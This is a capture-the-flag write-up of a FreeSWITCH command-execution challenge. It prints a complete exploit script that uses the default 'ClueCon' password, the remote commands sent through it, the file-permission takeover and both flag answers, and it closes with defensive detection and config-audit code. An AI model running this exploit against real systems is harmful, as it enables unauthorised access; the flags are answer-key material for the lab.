Flatline (TryHackMe)
Introduction
Nekrotic is a Windows-based CTF challenge that focuses on exploiting misconfigured VoIP services. This room teaches reconnaissance techniques for Windows systems, identifying vulnerable FreeSWITCH installations, and leveraging default credentials for remote command execution. Key skills include network enumeration with ping-blocking bypasses, searching for known exploits, and Windows file permission manipulation.
Flags
What are the flags?
This machine may be slower than normal to boot up and carry out operations.
Answer the questions below
What is the user.txt flag?
nmap -p- -sV -sC <IP_Address>
gobuster dir -u http://<IP_Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
The standard recon process doesn't work, and the site doesn't open.

nmap -Pn -p- -sV -sC <IP_Address>
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-04 17:36 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.49.147.144
Host is up (0.00038s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-EOM4PK0578N
| NetBIOS_Domain_Name: WIN-EOM4PK0578N
| NetBIOS_Computer_Name: WIN-EOM4PK0578N
| DNS_Domain_Name: WIN-EOM4PK0578N
| DNS_Computer_Name: WIN-EOM4PK0578N
| Product_Version: 10.0.17763
|_ System_Time: 2026-02-04T17:38:55+00:00
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2026-02-03T17:24:15
|_Not valid after: 2026-08-05T17:24:15
|_ssl-date: 2026-02-04T17:38:55+00:00; 0s from scanner time.
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.34 seconds
The issue was that the host was blocking ping probes. Using the -Pn flag to skip host discovery revealed the open ports: 3389 (ms-wbt-server) and 8021 (freeswitch-event).
Exploring FreeSWITCH (Port 8021)
Connecting to the FreeSWITCH event socket revealed a welcome message:
nc <IP_Address> 8021
nc 10.49.147.144 8021
Content-Type: auth/request
Content-Type: text/disconnect-notice
Content-Length: 67
Disconnected, goodbye.
See you at ClueCon! http://www.cluecon.com/
curl http://www.cluecon.com/
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>openresty</center>
</body>
</html>
The output showed a "ClueCon" reference; "ClueCon" is the default password for FreeSWITCH installations.
Finding the Exploit
Searched for FreeSWITCH exploits:
searchsploit FreeSWITCH
---------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------- ---------------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit) | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution | windows/remote/47799.txt
---------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit -m windows/remote/47799.txt
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /opt/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/47799.txt
ls
47799.txt CTFBuilder Downloads Pictures Rooms snap Tools
burp.json Desktop Instructions Postman Scripts thinclient_drives
cat 47799.txt
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
Running searchsploit FreeSWITCH turns up 47799.txt, a Python script for the "FreeSWITCH 1.10.1 - Command Execution" exploit. In the next step, we'll copy it into a Python file, then use it to find the user and root flags.
Gaining Command Execution
The exploit authenticates using the default password "ClueCon" and allows remote command execution:
mv 47799.txt freeswitch-exploit.py
chmod +x freeswitch-exploit.py
python3 freeswitch-exploit.py 10.49.147.144 whoami
Authenticated
Content-Type: api/response
Content-Length: 25
python3 freeswitch-exploit.py 10.49.147.144 "systeminfo"
Authenticated
Content-Type: api/response
Content-Length: 2189
python3 freeswitch-exploit.py 10.49.147.144 "ipconfig"
Authenticated
Content-Type: api/response
Content-Length: 347
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\Users"
Authenticated
Content-Type: api/response
Content-Length: 405
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\Users\Administrator\Desktop"
Authenticated
Content-Type: api/response
Content-Length: 449
Volume in drive C has no label.
Volume Serial Number is 84FD-2CC9
Directory of C:\Users\Administrator\Desktop
09/11/2021 07:18 <DIR> .
09/11/2021 07:18 <DIR> ..
08/11/2021 18:24 108,048,384 FreeSWITCH-1.10.1-Release-x64.msi
08/11/2021 06:05 413,584,335 OpenClinicSetup5.194.18_32bit_full_fr_en_pt_es_nl.exe
2 File(s) 521,632,719 bytes
2 Dir(s) 50,005,884,928 bytes free
Locating the User Flag
Searched for user.txt across the system:
python3 freeswitch-exploit.py 10.49.147.144 "dir C:\ /s /b | findstr /i flag"
Authenticated
Content-Type: api/response
Content-Length: 1348
C:\Program Files\FreeSWITCH\sounds\en\us\callie\base256\8000\flagpole.wav
C:\projects\openclinic\tomcat8\webapps\openclinic\WEB-INF\classes\be\mxs\common\model\vo\healthrecord\FlagsVO.class
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\belgiumflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\btc.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\burundiflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\enabel.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\maliflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\pf.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\rwandaflag.jpg
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\ukflag.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\flags\vub.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\shortcutIcons\icon_flag.png
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_dhx_skyblue\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_scbrblue\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_vista\iconFlag.gif
C:\projects\openclinic\tomcat8\webapps\openclinic\_img\treemenu\csh_winstyle\iconFlag.gif
root@ip-10-49-76-0:~# python3 freeswitch-exploit.py 10.49.147.144 "where /r C:\ user.txt"
Authenticated
Content-Type: api/response
Content-Length: 35
C:\Users\Nekrotic\Desktop\user.txt
Retrieving user flag:
python3 freeswitch-exploit.py 10.49.147.144 "type C:\Users\Nekrotic\Desktop\user.txt"
Authenticated
Content-Type: api/response
Content-Length: 38
root@ip-10-49-76-0:~# python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\user.txt"
Authenticated
Content-Type: api/response
Content-Length: 39
THM{64bca0843d535fa73eecdc59d27cbe26}

What is the root.txt flag?
Privilege Escalation to Root Flag
root.txt was located in the same directory as the user flag. However, initial access was denied even though we were running commands through FreeSWITCH. To get past the access restriction, we had to take ownership of the file and grant full permissions before retrieving the root flag.
python3 freeswitch-exploit.py 10.49.147.144 "where /r C:\ root.txt"
Authenticated
Content-Type: api/response
Content-Length: 35
C:\Users\Nekrotic\Desktop\root.txt
python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 456
Get-Content : Access to the path 'C:\Users\Nekrotic\Desktop\root.txt' is denied.
At line:1 char:1
+ Get-Content C:\Users\Nekrotic\Desktop\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Nekrotic\Desktop\root.txt:String) [Get-Content], Unauthorize
dAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
python3 freeswitch-exploit.py 10.49.147.144 "whoami"
Authenticated
Content-Type: api/response
Content-Length: 25
win-eom4pk0578n\nekrotic
python3 freeswitch-exploit.py 10.49.147.144 "icacls C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 58
Successfully processed 0 files; Failed processing 1 files
python3 freeswitch-exploit.py 10.49.147.144 "attrib C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 56
A C:\Users\Nekrotic\Desktop\root.txt
python3 freeswitch-exploit.py 10.49.147.144 "takeown /f C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 115
SUCCESS: The file (or folder): "C:\Users\Nekrotic\Desktop\root.txt" now owned by user "WIN-EOM4PK0578N\Nekrotic".
python3 freeswitch-exploit.py 10.49.147.144 "icacls C:\Users\Nekrotic\Desktop\root.txt /grant Everyone:F"
Authenticated
Content-Type: api/response
Content-Length: 109
processed file: C:\Users\Nekrotic\Desktop\root.txt
Successfully processed 1 files; Failed processing 0 files
python3 freeswitch-exploit.py 10.49.147.144 "type C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 38
python3 freeswitch-exploit.py 10.49.147.144 "powershell Get-Content C:\Users\Nekrotic\Desktop\root.txt"
Authenticated
Content-Type: api/response
Content-Length: 39
THM{8c8bc5558f0f3f8060d00ca231a9fb5e}
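From the defender's side, the takeown followed by icacls /grant Everyone:F sequence above is visible in process-creation logging. The following is an added example, not part of the original write-up: it correlates the two commands by file path, and the log records, timestamps and severity labels are constructed for illustration.

```python
import re

# Constructed process-creation records (time, command line); not taken from the room.
EVENTS = [
    ("17:50:01", r'cmd.exe /c whoami'),
    ("17:52:10", r'takeown /f C:\Users\Nekrotic\Desktop\root.txt'),
    ("17:52:40", r'icacls C:\Users\Nekrotic\Desktop\root.txt /grant Everyone:F'),
    ("17:55:00", r'icacls "C:\Data\reports" /grant BUILTIN\Users:(RX)'),
    ("17:56:00", r'takeown /F "C:\Temp\a.log"'),
]

# takeown ... /f <path>
TAKEOWN = re.compile(r'\btakeown(?:\.exe)?\b.*?/f\s+("[^"]+"|\S+)', re.I)
# icacls <path> ... /grant Everyone:F  (name or well-known SID S-1-1-0)
ICACLS = re.compile(
    r'\bicacls(?:\.exe)?\s+("[^"]+"|\S+).*?/grant(?::r)?\s+"?(Everyone|\*S-1-1-0):\(?F\)?',
    re.I)

def norm(path):
    """Normalise a Windows path for comparison (quotes, trailing slash, case)."""
    return path.strip('"').rstrip("\\").lower()

def detect(events):
    """Return (time, path, severity) for every Everyone:F grant.

    Severity is 'high' when the same path was the target of an earlier
    takeown, which is the ownership-then-open-ACL pattern from the write-up.
    """
    taken = {}      # path -> time ownership was taken
    alerts = []
    for ts, cmd in events:
        m = TAKEOWN.search(cmd)
        if m:
            taken[norm(m.group(1))] = ts
            continue
        m = ICACLS.search(cmd)
        if m:
            path = norm(m.group(1))
            alerts.append((ts, path, "high" if path in taken else "medium"))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```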

Conclusion
This room demonstrates the critical importance of changing default credentials in production services. FreeSWITCH's default "ClueCon" password provided complete system access, highlighting how VoIP and telephony platforms are often overlooked in security hardening. The challenge also reinforced Windows permission management skills and the importance of proper enumeration techniques when dealing with firewall-protected hosts. Default credentials remain one of the most exploited vulnerabilities in enterprise environments.
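The conclusion's point about default credentials can be turned into a configuration check. The following is an added example, not code from the room or from the FreeSWITCH project: it audits an event_socket.conf.xml for the "ClueCon" password and for exposure beyond loopback. Both XML samples are constructed, and the 16-character minimum and the "require an explicit loopback.auto ACL" rule are policy choices made for this example.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample: default password, wildcard bind, ACL commented out.
SAMPLE_DEFAULT = """
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!--<param name="apply-inbound-acl" value="loopback.auto"/>-->
  </settings>
</configuration>
"""

# Constructed sample: what the audit below accepts.
SAMPLE_HARDENED = """
<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="x9!constructed-long-random-value"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>
"""

def audit_event_socket(xml_text):
    """Return a list of findings for one event_socket.conf.xml document."""
    root = ET.fromstring(xml_text.strip())
    # ElementTree drops XML comments, so commented-out params count as unset.
    params = {p.get("name"): p.get("value", "") for p in root.iter("param")}
    findings = []
    password = params.get("password")
    if password in (None, "", "ClueCon"):
        findings.append("default-or-unset-password")
    elif len(password) < 16:          # example policy, not a FreeSWITCH rule
        findings.append("short-password")
    try:
        loopback = ipaddress.ip_address(params.get("listen-ip", "")).is_loopback
    except ValueError:                # unset or not an IP literal
        loopback = False
    if not loopback:
        findings.append("listen-ip-not-loopback")
    # Example policy: the inbound ACL must be pinned explicitly to loopback.
    if params.get("apply-inbound-acl") != "loopback.auto":
        findings.append("inbound-acl-not-loopback")
    return findings
```

Deployments that need remote event-socket access will fail the loopback checks by design; there the findings mark what has to be covered by a restrictive ACL and a non-default password.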




